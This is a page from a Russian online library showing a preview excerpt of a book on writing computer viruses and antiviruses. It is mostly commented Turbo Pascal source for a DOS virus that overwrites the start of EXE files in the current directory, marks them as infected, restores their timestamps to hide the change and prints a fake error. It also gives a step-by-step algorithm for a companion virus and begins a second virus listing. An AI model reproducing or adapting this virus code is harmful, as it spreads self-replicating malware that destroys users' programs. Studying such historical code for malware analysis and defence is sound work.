 |
|
Популярные авторы:: Joyce James :: Лондон Джек :: Раззаков Федор :: Андерсон Пол Уильям :: Говард Роберт Ирвин :: Тэффи Надежда :: Лавкрафт Говард Филлипс :: Пермяк Евгений Андреевич :: Пришвин Михаил Михайлович :: Пушкин Александр Сергеевич Популярные книги:: The Boarding House :: Бурый волк :: Хемингуэй :: Падение Томаса-Генpи :: 64 килобайта о Фидо :: Записные книжки (1925—1937) :: 1-е МАРТА 1917 года :: Царство теней :: Космическая Лапа :: Геноцид |
Создаем вирус и антивирусModernLib.Net / Игорь Гульев / Создаем вирус и антивирус - Чтение (Ознакомительный отрывок) (стр. 2)
TargetFile: PathStr; {Буфер для тела вируса} VirBuf : Array [1.VirLen] of Char; {Для даты/времени файла} Time : LongInt; {Счетчик количества инфицированных файлов} InfFiles : Byte; DirInfo : SearchRec; LabelBuf : Array [1.5] of Char; {Инициализация} procedure Init; begin LabelBuf[1]:=VirLabel[1]; LabelBuf[2]:=VirLabel[2]; LabelBuf[3]:=VirLabel[3]; LabelBuf[4]:=VirLabel[4]; LabelBuf[5]:=VirLabel[5]; {Обнуляем счетчик количества инфицированных файлов} InfFiles:=0; {Связываем файловую переменную VirBody с именем программы, из которой стартовали} Assign(VirBody, ParamStr(0)); {Открываем файл с recsize=1 байту} Reset(VirBody, 1); {Считываем из файла тело вируса в массив VirBuf} BlockRead(VirBody, VirBuf, VirLen); {Закрываем файл} Close(VirBody); end; {Поиск жертвы} procedure FindTarget; Var Sr: SearchRec; {Функция возвращает True, если найденная программа уже заражена, и False, если еще нет} function VirusPresent: Boolean; begin {Пока будем считать, что вируса нет} VirusPresent:=False; {Открываем найденный файл} Assign(Target, TargetFile); Reset(Target, 1); {Перемещаемся на длину тела вируса от начала файла} Seek(Target, VirLen); {Считываем 5 байт – если файл уже заражен, там находится метка вируса} BlockRead(Target, VirIdentifier, 5); If VirIdentifier=VirLabel Then {Если метка есть, значит есть и вирус} VirusPresent:=True; end; {Процедура заражения} procedure InfectFile; begin {Если размер найденного файла меньше, чем длина вируса плюс 100 байт, то выходим из процедуры} If Sr.Size < VirLen+100 Then Exit; {Если найденная программа еще не заражена, инфицируем ее} If Not VirusPresent Then begin {Запомним дату и время файла. Атрибуты запоминать не надо, так как поиск ведется среди файлов с атрибутом Archive, а этот атрибут устанавливается на файл после сохранения в любом случае} Time:=Sr.Time; {Открываем для заражения} Assign(Target, TargetFile); Reset(Target, 1); {Записывам тело вируса в начало файла} BlockWrite(Target, VirBuf, VirLen); {Перемещаем указатель текущей позиции на длину вируса от начала файла} Seek(Target, VirLen); {Вписываем метку заражения} BlockWrite(Target, LabelBuf, 5); {Устанавливаем дату и время файла} SetFTime(Target, Time); {Закрываем} Close(Target); {Увеличиваем счетчик инфицированных файлов} Inc(InfFiles); end; end; {Начало процедуры FindTarget} begin {Ищем в текущем каталоге файлы по маске *.EXE с атрибутами Archive} FindFirst(’*.EXE’, Archive, Sr); {Пока есть файлы для заражения} While DosError=0 Do begin If Sr.Name=’’ Then Exit; {Запоминаем имя найденного файла в переменную TargetFile} TargetFile:=Sr.Name; {Вызываем процедуру заражения} InfectFile; {Если заразили InfCount файлов, завершаем поиск} If InfFiles > InfCount Then Exit; {Ищем следующий файл по маске} FindNext(Sr); end; end; {Основное тело} begin {Инициализируемся} Init; {Ищем жертвы и заражаем их} FindTarget; {Выдаем на экран сообщение об ошибке} WriteLn(’Abnormal program termination.’); {Это чтобы компилятор вставил в код константы VirName и Author, условие же поставлено таким образом, что эти строки никогда не будут выведены на экран} If 2=3 Then begin WriteLn(VirName); WriteLn(Author); end; end. Вирусы-спутники (Companion) Вирусы-спутники сейчас широко распространены – соотношение companion и parasitic вирусов примерно один к двум. Смысл этого метода – не трогая «чужого кота» (EXE-программу), создать «своего» – COM-файл с именем EXE-программы. Алгоритм работы такого вируса предельно прост, так как отпадает необходимость лишних действий (например, сохранения в теле вируса длины откомпилированного EXE-файла с вирусным кодом, считывания в буфер тела вируса, запуска файла, из которого вирус получил управление). Незачем даже хранить метку для определения инфицирования файла. Заражение производится с помощью командного процессора: 1. Если в командной строке указаны параметры, сохранить их в переменную типа String для передачи инфицированной программе. 2. Найти EXE-файл-жертву. 3. Проверить, не присутствует ли в каталоге с найденным EXE-файлом COM-файл с таким же именем, как у файла-жертвы. 4. Если такой COM-файл присутствует, файл уже заражен, переходим к пункту 6. 5. С помощью командного процессора скопировать файл, из которого получено управление, в файл с именем жертвы и расширением COM. 6. Процедурой Exec загрузить и выполнить файл с именем стартового, но с расширением EXE – то есть выполнить инфицированную программу. 7. Вернуть управление в DOS. Приведенный ниже листинг показывает заражение файлов этим методом. {$M 2048, 0, 0} {$A–} {$B–} {$D–} {$E+} {$F–} {$G–} {$I–} {$L–} {$N–} {$S–} {$V–} {$X+} {Используются модули Dos и System (модуль System автоматически подключается к каждой программе при компиляции)} Uses Dos; Const {Имя вируса} VirName=’Guest’; Author=’Dirty Nazi/SGWW. 4 PVT only!’; {Количество зараженных за один сеанс работы файлов} InfCount=2; Var {Для имени найденного файла} TargetFile : PathStr; {Для создания копии} TargetCOM : PathStr; {Счетчик количества заражений} InfFiles : Byte; DirInfo : SearchRec; {Для сохранения параметров командной строки} Parms : String; {Для цикла For} I: Byte; {Поиск жертв} procedure FindTarget; Var Sr : SearchRec; {Функция возвращает True, если найденная программа уже заражена, и False, если еще нет} function VirusPresent: Boolean; Var Target : File; 1, 2 |
|||||||